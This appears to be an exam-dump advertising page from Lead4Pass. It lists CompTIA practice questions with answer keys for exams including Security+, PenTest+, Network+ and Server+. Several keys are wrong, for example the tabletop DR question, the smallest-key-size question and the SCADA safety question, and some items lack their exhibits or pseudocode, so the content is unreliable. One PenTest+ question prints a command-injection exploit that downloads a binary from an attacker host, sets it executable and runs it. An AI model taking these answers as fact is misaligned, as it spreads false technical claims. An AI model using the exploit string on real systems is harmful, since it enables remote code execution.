The latest updated and revised CompTIA fc0-u61 exam questions and answers come from Lead4Pass! Complete CompTIA fc0-u61 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA fc0-u61 dumps with PDF and VCE: https://www.leads4pass.com/fc0-u61.html (fc0-u61 dumps)
Latest update CompTIA fc0-u61 exam questions and answers online practice test
QUESTION 1 For a disaster recovery exercise, a company wants to ensure customer data is recovered before operational data. This is an example of: A. redundancy. B. replication. C. prioritization. D. fault tolerance. Correct Answer: C
QUESTION 2 Which of the following is a compiled language? A. Perl B. JScript C. Java D. PowerShell Correct Answer: C
QUESTION 3 A startup company has created a logo. The company wants to ensure no other entity can use the logo for any purpose. Which of the following should the company use to BEST protect the logo? (Select TWO). A. Patent B. Copyright C. NDA D. Trademark E. EULA Correct Answer: BD
QUESTION 4 Which of the following would a company consider an asset? A. An external company used to destroy defective hard drives B. Information residing on backup tapes C. A company-sponsored technology conference D. A certified third-party vendor that provides critical components Correct Answer: B
QUESTION 5 Given the following pseudocode: If there are seven apples in the basket, which of the following would be the number of oranges a person eats?
A. 10 B. 14 C. 15 D. 17 Correct Answer: C
QUESTION 6 A user revisits a website and receives a message that the site may not be secure. The user is prompted to click a link to continue to the site. Which of the following would MOST likely identify the issue? A. Checking the proxy settings B. Checking that caching is enabled C. Checking browser add-ons D. Checking certificate validity Correct Answer: D
QUESTION 7 Ann, the president of a company, has requested assistance with choosing the appropriate Internet connectivity for her home. The home is in a remote location and has no connectivity to existing infrastructure. Which of the following Internet service types should MOST likely be used? A. Fiber B. DSL C. Cable D. Satellite Correct Answer: D
QUESTION 8 Which of the following BEST describes the practice of providing user credentials when logging onto the network? A. Output B. Storage C. Input D. Processing Correct Answer: C
QUESTION 9 A user wants to ensure port 3389 is open for remote desktop on a PC. Which of the following describes where the user should verify the port is open? A. Antivirus B. Anti-malware C. Device Manager D. Host firewall Correct Answer: D
QUESTION 10 Which of the following would indicate the FASTEST processor speed? A. 3.6GHz B. 3.6MHz C. 3.6Mbps D. 3.6Gbps Correct Answer: A
QUESTION 11 SQL databases use primary and foreign keys to enable which of the following? A. Rows B. Fields C. Schemas D. Relationships Correct Answer: D
QUESTION 12 A UPS provides protection against: A. denial of service B. replay attack. C. power outages. D. wiretapping. Correct Answer: C
QUESTION 13 A technician is installing a new wireless network and wants to secure the wireless network to prevent unauthorized access. Which of the following protocols would be the MOST secure? A. WPA B. SSID C. WEP D. WPA2 Correct Answer: D
QUESTION 14 A systems administrator wants to return results for a time range within a database. Which of the following commands should the administrator use? A. SELECT B. INSERT C. DELETE D. UPDATE Correct Answer: A
QUESTION 15 Which of the following is MOST likely used to represent international text data? A. ASCII B. Octal C. Hexadecimal D. Unicode Correct Answer: D
Update the latest valid CompTIA fc0-u61 test questions and answers throughout the year. Upload the latest fc0-u61 exam practice questions and fc0-u61 PDF for free every month. Get the complete fc0-u61 Exam Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass fc0-u61 Dumps (including PDF and SOFTWARE), please lead4pass fc0-u61 dumps: https://www.leads4pass.com/fc0-u61.html (146 Q&A)
The latest updated and revised CompTIA PT1-002 exam questions and answers come from Lead4Pass! Complete CompTIA PT1-002 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA PT1-002 dumps with PDF and VCE: https://www.leads4pass.com/pt1-002.html (131 Q&A)
Latest update CompTIA PT1-002 exam questions and answers online practice test
QUESTION 1 DRAG DROP You are a penetration tester reviewing a client\\’s website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
QUESTION 3 A penetration tester has been given eight business hours to gain access to a client\\’s financial system. Which of the following techniques will have the highest likelihood of success? A. Attempting to tailgate an employee going into the client\\’s workplace B. Dropping a malicious USB key with the company\\’s logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management Correct Answer: C
QUESTION 4 A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company\\’s privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? A. OpenVAS B. Nikto C. SQLmap D. Nessus Correct Answer: C Reference: https://phoenixnap.com/blog/best-penetration-testing-tools
QUESTION 5 When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client\\’s systems? A. The proposed mitigations and remediations in the final report do not include a cost-benefit analysis. B. The NDA protects the consulting firm from future liabilities in the event of a breach. C. The assessment reviewed the cyber key terrain and most critical assets of the client\\’s network. D. The penetration test is based on the state of the system and its configuration at the time of assessment. Correct Answer: D
QUESTION 6 A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST “ exploit += “/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} – c${IFS}\\’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache\\’% 0A%27andloginUser=aandPwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement? A. grep –v apache ~/.bash_history > ~/.bash_history B. rm –rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM “apache” /F Correct Answer: B
QUESTION 7 Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once. Select and Place:
Correct Answer:
QUESTION 8 Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU Correct Answer: C
QUESTION 9 A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client\\’s VM. Which of the following cloud attacks did the penetration tester MOST likely implement? A. Direct-to-origin B. Cross-site scripting C. Malware injection D. Credential harvesting Correct Answer: A
QUESTION 10 Performing a penetration test against an environment with SCADA devices brings additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects. Correct Answer: C Reference: https://www.hindawi.com/journals/scn/2018/3794603/
QUESTION 11 A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following: Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability analysis Exploitation and post exploitation Reporting Which of the following methodologies does the client use? A. OWASP Web Security Testing Guide B. PTES technical guidelines C. NIST SP 800-115 D. OSSTMM Correct Answer: B Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/
QUESTION 12 A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service? A. arPspoof B. nmap C. responder D. burpsuite Correct Answer: B Reference: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/
QUESTION 13 A penetration tester conducted a vulnerability scan against a client\\’s critical servers and found the following:
Which of the following would be a recommendation for remediation? A. Deploy a user training program B. Implement a patch management plan C. Utilize the secure software development life cycle D. Configure access controls on each of the servers Correct Answer: B
QUESTION 14 A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server. Correct Answer: B Reference: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b
QUESTION 15 Which of the following documents BEST describes the manner in which a security assessment will be conducted? A. BIA B. SOW C. SLA D. MSA Correct Answer: A
Update the latest valid CompTIA PT1-002 test questions and answers throughout the year. Upload the latest PT1-002 exam practice questions and PT1-002 PDF for free every month. Get the complete PT1-002 Exam Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass PT1-002 Dumps (including PDF and SOFTWARE), please visit: https://www.leads4pass.com/pt1-002.html (131 Q&A)
The latest updated and revised CompTIA SK0-005 exam questions and answers come from Lead4Pass! Complete CompTIA SK0-005 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA SK0-005 dumps with PDF and VCE: https://www.leads4pass.com/sk0-005.html (101 Q&A)
Latest update CompTIA SK0-005 exam questions and answers online practice test
QUESTION 1 Which of the following DR testing scenarios is described as verbally walking through each step of the DR plan in the context of a meeting? A. Live failover B. Simulated failover C. Asynchronous D. Tabletop Correct Answer: A
QUESTION 2 A technician is connecting a Linux server to a share on a NAS. Which of the following is the MOST appropriate native protocol to use for this task? A. CIFS B. FTP C. SFTP D. NFS Correct Answer: A Reference: https://www.redhat.com/en/topics/data-storage/network-attached-storage
QUESTION 4 A systems administrator is performing maintenance on 12 Windows servers that are in different racks at a large datacenter. Which of the following would allow the administrator to perform maintenance on all 12 servers without having to physically be at each server? (Choose two.) A. Remote desktop B. IP KVM C. A console connection D. A virtual administration console E. Remote drive access F. A crash cart Correct Answer: AB Reference: https://www.blackbox.be/en-be/page/27559/Resources/Technical-Resources/Black-Box-Explains/kvm/Benefits-of-using-KVM-over-IP
QUESTION 5 After configuring IP networking on a newly commissioned server, a server administrator installs a straight-through network cable from the patch panel to the switch. The administrator then returns to the server to test network connectivity using the ping command. The partial output of the ping and ipconfig commands are displayed below:
The administrator returns to the switch and notices an amber link light on the port where the server is connected. Which of the following is the MOST likely reason for the lack of network connectivity? A. Network port security B. An improper VLAN configuration C. A misconfigured DHCP server D. A misconfigured NIC on the server Correct Answer: D
QUESTION 6 A company is running an application on a file server. A security scan reports the application has a known vulnerability. Which of the following would be the company\\’s BEST course of action? A. Upgrade the application package B. Tighten the rules on the firewall C. Install antivirus software D. Patch the server OS Correct Answer: D Reference https://www.sciencedirect.com/topics/computer-science/vulnerability-scanner
QUESTION 7 A server administrator needs to harden a server by only allowing secure traffic and DNS inquiries. A port scan reports the following ports are open: A. 21 B. 22 C. 23 D. 53 E. 443 F. 636 Correct Answer: D Reference: https://tools.cisco.com/security/center/resources/dns_best_practices
QUESTION 8 Users at a remote site have reported that a regularly used server is inaccessible. The systems administrator knows users at another site also use the same server, so the administrator contacts them to see if the same issue is occurring. Which of the following troubleshooting steps is this an example of? A. Establish a plan to resolve the issue. B. Establish a theory of probable cause. C. Establish the scope of the issue. D. Test the theory of probable cause. Correct Answer: C
QUESTION 9 A technician is trying to determine the reason why a Linux server is not communicating on a network. The returned network configuration is as follows: eth0: flags=4163 mtu 1500 inet 127.0.0.1 network 255.255.0.0 broadcast 127.0.0.1 Which of the following BEST describes what is happening? A. The server is configured to use DHCP on a network that has multiple scope options B. The server is configured to use DHCP, but the DHCP server is sending an incorrect subnet mask C. The server is configured to use DHCP on a network that does not have a DHCP server D. The server is configured to use DHCP, but the DHCP server is sending an incorrect MTU setting Correct Answer: B
QUESTION 10 A server administrator has been creating new VMs one by one. The administrator notices the system requirements are very similar, even with different applications. Which of the following would help the administrator accomplish this task in the SHORTEST amount of time and meet the system requirements? A. Snapshot B. Deduplication C. System Restore D. Template Correct Answer: D
QUESTION 11 A user cannot save large files to a directory on a Linux server that was accepting smaller files a few minutes ago. Which of the following commands should a technician use to identify the issue? A. pvdisplay B. mount C. df -h D. fdisk -l Correct Answer: C
QUESTION 12 A server is performing slowly, and users are reporting issues connecting to the application on that server. Upon investigation, the server administrator notices several unauthorized services running on that server that are successfully communicating to an external site. Which of the following are MOST likely causing the issue? (Choose two.) A. Adware is installed on the users\\’ devices B. The firewall rule for the server is misconfigured C. The server is infected with a virus D. Intrusion detection is enabled on the network E. Unnecessary services are disabled on the server F. SELinux is enabled on the server Correct Answer: AC
QUESTION 13 An administrator is configuring a server that will host a high-performance financial application. Which of the following disk types will serve this purpose? A. SAS SSD B. SATA SSD C. SAS drive with 10000rpm D. SATA drive with 15000rpm Correct Answer: A Reference: https://www.hp.com/us-en/shop/tech-takes/sas-vs-sata
QUESTION 14 An administrator is sizing a new server that will run a 1TB database. One of the processor options is the size of the L2 cache. The administrator picks the processor with the least amount of L2 cache. Which of the following is an outcome of this selection? A. The processor will be faster with a lower L2 cache, speeding up database access times. B. The database will be slower because of a lower amount of cache hits. C. Database access does not rely on cache, so there will be no difference in performance. D. The cost of the processor will be higher. Correct Answer: B
QUESTION 15 Ann, an administrator, is configuring a two-node cluster that will be deployed. To check the cluster\\’s functionality, she shuts down the active node. Cluster behavior is as expected, and the passive node is now active. Ann powers on the server again and wants to return to the original configuration. Which of the following cluster features will allow Ann to complete this task? A. Heartbeat B. Failback C. Redundancy D. Load balancing Correct Answer: B
Update the latest valid CompTIA SK0-005 test questions and answers throughout the year. Upload the latest SK0-005 exam practice questions and SK0-005 PDF for free every month. Get the complete SK0-005 Exam Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass SK0-005 Dumps (including PDF and SOFTWARE), please visit: https://www.leads4pass.com/sk0-005.html (1148 Q&A)
The latest updated and revised CompTIA N10-007 exam questions and answers come from Lead4Pass! Complete CompTIA N10-007 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA N10-007 dumps with PDF and VCE: https://www.leads4pass.com/n10-007.html (1148 Q&A)
Latest update CompTIA N10-007 exam questions and answers online practice test
QUESTION 1 Which of the following can be used to prevent unauthorized employees from entering restricted areas? A. Sign-in sheets B. Video cameras C. Motion sensors D. Swipe badges Correct Answer: D
QUESTION 2 A company hires another firm to test the integrity of its information security controls. This is an example of: A. role separation B. device hardening C. risk assessment D. penetration testing Correct Answer: D
QUESTION 3 Which of the following is an IPv6 address? A. 00:14:38:05:7B:E5 B. 10.10.1.1 C. 192.168.1.1 D. 2001:cdba::3257:9652 Correct Answer: D
QUESTION 4 A technician is performing a site survey in an area of a university where both faculty and students are reporting poor performance of their wireless connections. The technician gathers the following data in the problem area: Which of the following would MOST likely resolve the issue?
A. There are too many wireless clients. Increase the number of APs to handle the traffic load. B. The SNR is not at an acceptable level. Change the channel on the APs. C. The signal strength is too low. Replace the equipment with devices that have better radio antennas. D. The channel numbers on some APs are invalid. Switch AP2 and AP3 to use channel 1. E. The type of antenna is inappropriate for the environment. Switch to 13dBi Yagi antennas. Correct Answer: B
QUESTION 5 Which of the following IP addresses would be classified as private? A. 10.100.200.0 B. 169.253.10.20 C. 172.168.5.0 D. 200.100.25.0 Correct Answer: A
QUESTION 6 Zach, a network technician, is configuring several switches to be managed remotely. Which of the following must be configured to connect via SSH to each of those devices, as well as to retrieve various parameters? A. PoE settings and VTP configuration B. SNMP configuration only C. IP address and SNMP configuration D. QoS and PoE settings Correct Answer: C
QUESTION 7 Which of the following VPN technologies should a network technician utilize to tunnel IPv6 traffic and multicast over an IPv4 WAN link? A. AH B. DTLS C. SSL D. GRE Correct Answer: D
QUESTION 8 Joe, a network technician, has received a report that one of his clients is experiencing an issue connecting to the network. Joe observes two clients are connected to a hub, which is connected to separate wall jacks. Which of the following has MOST likely occurred? A. Switching loop B. ARP cache poisoning C. Improperly tagged ports D. Wrong VLAN assignment E. Duplicate IP addresses Correct Answer: A
QUESTION 9 Which of the following DNS records allows for reverse lookup of a domain? A. PTR B. AAAA C. A D. MX Correct Answer: A
QUESTION 10 Multiple users are experiencing slow performance when downloading large files from a specific site. Which of the following should the technician do to check the connection to the external site? A. Check the latency by running a continuous ping to the site. B. Perform the ipconfig/flushdns command on the affected users\\’ PCs. C. Run a speedtest from a user\\’s PC to a site on the Internet. D. Verify if there is MTU mismatch in the path to the site. Correct Answer: A
QUESTION 11 A network technician is troubleshooting a connectivity issue with Joe, a user. Joe has reported that when he attempts to RDP to machine1 (192.168.21.21) by name, he is connected to machine3 (192.168.21.23). When the network technician runs the command nslookup machine1, it returns the IP address 192.168.21.23; but when the ping –a 192.168.21.23 command is run, the results return the hostname machine3. Which of the following DNS records should be updated to allow RDP connections to machine1 by hostname? A. A B. SRV C. PTR D. TXT Correct Answer: A
QUESTION 12 In the past, users brought personal laptops to the office to bypass some of the security protocols on their desktops. Due to new security initiatives, management has asked that users not be allowed to attach personal devices to the network. Which of the following should a technician use to BEST meet this goal? A. Shut down unused ports on switches B. Upgrade firmware on network devices C. Allow only secure protocols on the network D. Disable unnecessary services Correct Answer: C
QUESTION 13 A user claims to have no Internet access but can access local resources. A technician determines the issue is with a configuration because a ping to a working public website shows a response that starts with: Ping request could not find host Which of the following is the MOST likely misconfiguration? A. Incorrect netmask B. DNS C. DHCP D. SSL certificate Correct Answer: B
QUESTION 14 Which of the following WAN technologies is MOST preferred when developing a VoIP system with 23 concurrent channels? A. DSL B. POTS C. T1 D. DOCSIS Correct Answer: C
QUESTION 15 A network administrator is going to be performing a major upgrade to the network. Which of the following should the administrator use in case of a failure? A. Baseline report B. Vulnerability report C. Rollback plan D. Business continuity plan Correct Answer: C
Update the latest valid CompTIA N10-007 test questions and answers throughout the year. Upload the latest N10-007 exam practice questions and N10-007 PDF for free every month. Get the complete N10-007 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass N10-007 Dumps (including PDF and SOFTWARE), please visit: https://www.leads4pass.com/n10-007.html (1148 Q&A)
The latest updated and revised CompTIA SY0-601 exam questions and answers come from Lead4Pass! Complete CompTIA SY0-601 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA SY0-601 dumps with PDF and VCE: https://www.leads4pass.com/sy0-601.html (401 Q&A)
Latest update CompTIA SY0-601 exam questions and answers online practice test
QUESTION 1 A document that appears to be malicious has been discovered in an email that was sent to a company\\’s Chief Financial Officer (CFO). Which of the following would be BEST to allow a security analyst to gather information and confirm it is a malicious document without executing any code it may contain? A. Open the document on an air-gapped network B. View the document\\’s metadata for origin clues C. Search for matching file hashes on malware websites D. Detonate the document in an analysis sandbox Correct Answer: D
QUESTION 2 A smart retail business has a local store and a newly established and growing online storefront. A recent storm caused a power outage to the business and the local ISP, resulting in several hours of lost sales and delayed order processing. The business owner now needs to ensure two things: 1. Protection from power outages 2. Always-available connectivity In case of an outage The owner has decided to implement battery backups for the computer equipment Which of the following would BEST fulfill the owner\\’s second need? A. Lease a point-to-point circuit to provide dedicated access. B. Connect the business router to its own dedicated UPS. C. Purchase services from a cloud provider for high availability D. Replace the business\\’s wired network with a wireless network. Correct Answer: C
QUESTION 3 A security analyst has been asked to investigate a situation after the SOC started to receive alerts from the SIEM. The analyst first looks at the domain controller and finds the following events:
To better understand what is going on, the analyst runs a command and receives the following output:
Based on the analyst\\’s findings, which of the following attacks is being executed? A. Credential harvesting B. Keylogger C. Brute-force D. Spraying Correct Answer: D
QUESTION 4 Phishing and spear-phishing attacks have been occurring more frequently against a company\\’s staff. Which of the following would MOST likely help mitigate this issue? A. DNSSEC and DMARC B. DNS query logging C. Exact mail exchanger records in the DNS D. The addition of DNS conditional forwarders Correct Answer: C
QUESTION 5 A security analyst is reviewing information regarding recent vulnerabilities. Which of the following will the analyst MOST likely consult to validate which platforms have been affected? A. OSINT B. SIEM C. CVSS D. CVE Correct Answer: D
QUESTION 6 A local coffee shop runs a small WiFi hotspot for its customers that utilizes WPA2-PSK. The coffee shop would like to stay current with security trends and wants to implement WPA3 to make its WiFi even more secure. Which of the following technologies will the coffee shop MOST likely use in place of PSK? A. WEP B. MSCHAP C. WPS D. SAE Correct Answer: D
QUESTION 7 A security analyst is investigating an incident that was first reported as an issue connecting to network shares and the Internet. While reviewing logs and tool output, the analyst sees the following:
Which of the following attacks has occurred? A. IP conflict B. Pass-the-hash C. MAC flooding D. Directory traversal E. ARP poisoning Correct Answer: E
QUESTION 8 A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal? A. Salting the magnetic strip information B. Encrypting the credit card information in transit. C. Hashing the credit card numbers upon entry. D. Tokenizing the credit cards in the database Correct Answer: C
QUESTION 9 A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be nondisruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA? A. One-time passwords B. Email tokens C. Push notifications D. Hardware authentication Correct Answer: C
QUESTION 10 After reading a security bulletin, a network security manager is concerned that a malicious actor may have breached the network using the same software flaw. The exploit code is publicly available and has been reported as being used against other industries in the same vertical. Which of the following should the network security manager consult FIRST to determine a priority list for forensic review? A. The vulnerability scan output B. The IDS logs C. The full packet capture data D. The SIEM alerts Correct Answer: A
QUESTION 11 A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the MOST likely cause of this issue? A. An external access point is engaging in an evil-twin attack. B. The signal on the WAP needs to be increased in that section of the building. C. The certificates have expired on the devices and need to be reinstalled. D. The users in that section of the building are on a VLAN that is being blocked by the firewall. Correct Answer: A
QUESTION 12 A cybersecurity department purchased o new PAM solution. The team is planning to randomize the service account credentials of the Windows server first. Which of the following would be the BEST method to increase the security on the Linux server? A. Randomize the shared credentials B. Use only guest accounts to connect. C. Use SSH keys and remove generic passwords D. Remove all user accounts. Correct Answer: C
QUESTION 13 Which of the following algorithms has the SMALLEST key size? A. DES B. Twofish C. RSA D. AES Correct Answer: B
QUESTION 14 A network administrator needs to build out a new datacenter, with a focus on resiliency and uptime. Which of the following would BEST meet this objective? (Choose two.) A. Dual power supply B. Off-site backups C. Automatic OS upgrades D. NIC teaming E. Scheduled penetration testing F. Network-attached storage Correct Answer: AB
QUESTION 15 Which of the following would be BEST to establish between organizations that have agreed cooperate and are engaged in early discussion to define the responsibilities of each party, but do not want to establish a contractually binding agreement? A. An SLA B. AnNDA C. ABPA D. AnMOU Correct Answer: D
Update the latest valid CompTIA SY0-601 test questions and answers throughout the year. Upload the latest SY0-601 exam practice questions and SY0-601 PDF for free every month. Get the complete SY0-601 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass SY0-601 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/sy0-601.html (PDF + VCE)
The latest updated and revised CompTIA SY0-501 exam questions and answers come from Lead4Pass! Complete CompTIA SY0-501 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA SY0-501 dumps with PDF and VCE: https://www.leads4pass.com/sy0-501.html (1423 Q&A)
Latest update CompTIA SY0-501 exam questions and answers online practice test
QUESTION 1 A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation Correct Answer: D RADIUS generally includes 802.1X that pre-authenticates devices.
QUESTION 2 An attacker captures the encrypted communication between two parties for a week, but is unable to decrypt the messages. The attacker then compromises the session key during one exchange and successfully compromises a single message. The attacker plans to use this key to decrypt previously captured and future communications, but is unable to. This is because the encryption scheme in use adheres to: A. Asymmetric encryption B. Out-of-band key exchange C. Perfect forward secrecy D. Secure key escrow Correct Answer: C
QUESTION 3 A security administrator is implementing a new WAF solution and has placed some of the web servers behind the WAF, with the WAF set to audit mode. When reviewing the audit logs of external requests and posts to the web servers, the administrator finds the following entry:
Based on this data, which of the following actions should the administrator take? A. Alert the web server administrators to a misconfiguration. B. Create a blocking policy based on the parameter values. C. Change the parameter name `Account_Name\\’ identified in the log. D. Create an alert to generate emails for abnormally high activity. Correct Answer: D
QUESTION 4 An organization would like to set up a more robust network access system. The network administrator suggests the organization move to a certificate-based authentication setup in which a client-side certificate is used while connecting. Which of the following EAP types should be used to meet these criteria? A. EAP-TLS B. EAP-FAST C. EAP-MD5 D. EAP-TTLS Correct Answer: A
QUESTION 5 A security analyst wants to verify that a client-server (non-web) application is sending encrypted traffic. Which of the following should the analyst use? A. openssl B. hping C. netcat D. tcpdump Correct Answer: D
QUESTION 6 A security analyst is determining the point of compromise after a company was hacked. The analyst checks the server logs and sees that a user account was logged in at night, and several large compressed files were exfiltrated. The analyst then discovers the user last logged in four years ago and was terminated. Which of the following should the security analyst recommend to prevent this type of attack in the future? (Choose two.) A. Review and update the firewall settings B. Restrict the compromised user account C. Disable all user accounts that are not logged in to for 180 days D. Enable a login banner prohibiting unauthorized use E. Perform an audit of all company user accounts F. Create a honeypot to catch the hacker Correct Answer: BE
QUESTION 7 An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis indicates the impact.
Which of the following is this table an example of? A. Internal threat assessment B. Privacy impact assessment C. Qualitative risk assessment D. Supply chain assessment Correct Answer: C
QUESTION 8 An organization\\’s employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? A. Transitive trust B. Single sign-on C. Federation D. Secure token Correct Answer: B
QUESTION 9 For each of the given items, select the appropriate authentication category from the drop down choices.
Select the appropriate authentication type for the following items: Hot Area:
Correct Answer:
Biometrics refers to a collection of physical attributes of the human body that can be used as identification or an authentication factor. Fingerprints and retinas are physical attributes of the human body. Two types of tokens exist, Time-based one-time password (TOTP) tokens and HMACbased one-time password (HOTP). TOTP tokens generate passwords at fixed time intervals, whereas HOTP tokens generate passwords not based on fixed time intervals but instead based on a non-repeating one-way function, such as a hash or HMAC operation. Smart cards can have Multi-factor and proximity authentication embedded into it. PAP allows for two entities to share a password in advance and use the password as the basis of authentication. The same goes for PIN numbers. References: Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 282, 285 http://en.wikipedia.org/wiki/Password_authentication_protocol#Working_cycle http://en.wikipedia.org/wiki/Smart_card#Security
QUESTION 10 An organization has the following password policies: Passwords must be at least 16 characters long. A password cannot be the same as any previous 20 passwords. Three failed login attempts will lock the account for five minutes. Passwords must have one uppercase letter, one lowercase letter, and one non- alphanumeric symbol. A database server was recently breached, and the incident response team suspects the passwords were compromised. Users with permission on that database server were forced to change their passwords for that server. Unauthorized and suspicious logins are now being detected on a completely separate server. Which of the following is MOST likely the issue and the best solution? A. Some users are reusing passwords for different systems; the organization should scan for password reuse across systems. B. The organization has improperly configured single sign-on; the organization should implement a RADIUS server to control account logins. C. User passwords are not sufficiently long or complex: the organization should increase the complexity and length requirements for passwords. D. The trust relationship between the two servers has been compromised: the organization should place each server on a separate VLAN. Correct Answer: A
QUESTION 11 Which of the following BEST explains the difference between a credentialed scan and a non- credentialed scan? A. A credentialed scan sees devices in the network, including those behind NAT, while a non- credentialed scan sees outward-facing applications. B. A credentialed scan will not show up in system logs because the scan is running with the necessary authorization, while non-credentialed scan activity will appear in the logs. C. A credentialed scan generates significantly more false positives, while a non-credentialed scan generates fewer false positives D. A credentialed scan sees the system the way an authorized user sees the system, while a non- credentialed scan sees the system as a guest. Correct Answer: D
QUESTION 12 Which of the following controls does a mantrap BEST represent? A. Deterrent B. Detective C. Physical D. Corrective Correct Answer: C
QUESTION 13 A recent internal audit is forcing a company to review each internal business unit\\’s VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration Correct Answer: C
QUESTION 14 A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices? A. Install a corporately monitored mobile antivirus on the devices. B. Prevent the installation of applications from a third-party application store. C. Build a custom ROM that can prevent jailbreaking. D. Require applications to be digitally signed. Correct Answer: D
QUESTION 15 An audit has revealed that database administrators are also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern? A. Time of day restrictions B. Principle of least privilege C. Role-based access control D. Separation of duties Correct Answer: D
Update the latest valid CompTIA SY0-501 test questions and answers throughout the year. Upload the latest SY0-501 exam practice questions and SY0-501 PDF for free every month. Get the complete SY0-501 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass SY0-501 Dumps (including PDF and VCE), please visit: https://www.leads4pass.com/sy0-501.html (PDF + VCE)
The latest updated and revised CompTIA CV0-003 exam questions and answers come from Lead4Pass! Complete CompTIA CV0-003 dumps certification questions! Welcome to download the latest Lead4Pass CompTIA CV0-003 dumps with PDF and VCE: https://www.leads4pass.com/cv0-003.html (142 Q&A)
Latest update CompTIA CV0-003 exam questions and answers online practice test
QUESTION 1 Given the metric below:
Using iSCSI storage reports across three datacenters, which of the following recorded metrics indicates an anomaly in the performance? A. Disk latency B. CPU utilization C. WAN latency D. RAM utilization Correct Answer: D
QUESTION 2 A cloud administrator is switching hosting companies and using the same script that was previously used to deploy VMs in the new cloud. The script is returning errors that the command was not found. Which of the following is the MOST likely cause of the script failure? A. Account mismatches B. IP address changes C. API version incompatibility D. Server name changes Correct Answer: C
QUESTION 3 A global web-hosting company is concerned about the availability of its platform during an upcoming event. Web traffic is forecasted to increase substantially during the next week. The site contains mainly static content. Which of the following solutions will assist with the increased workload? A. DoH B. WAF C. IPS D. CDN Correct Answer: D Reference: https://www.globaldots.com/content-delivery-network-explained
QUESTION 4 A systems administrator disabled TLS 1.0 and 1.1, as well as RC4, 3DES, and AES-128 ciphers for TLS 1.2, on a web server. A client now reports being unable to access the web server, but the administrator verifies that the server is online, the web service is running, and other users can reach the server as well. Which of the following should the administrator recommend the user do FIRST? A. Disable antivirus/anti-malware software B. Turn off the software firewall C. Establish a VPN tunnel between the computer and the web server D. Update the web browser to the latest version Correct Answer: B
QUESTION 5 A systems administrator recently deployed a VDI solution in a cloud environment; however, users are now experiencing poor rendering performance when trying to display 3-D content on their virtual desktops, especially at peak times. Which of the following actions will MOST likely solve this issue? A. Update the quest graphics drivers from the official repository B. Add more vGPU licenses to the host C. Instruct users to access virtual workstations only on the VLAN D. Select vGPU profiles with higher video RAM Correct Answer: D Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/data-center-virtualization/desktop-virtualization-solutionsvmware-horizon-view/whitepaper-c11-741606.pdf
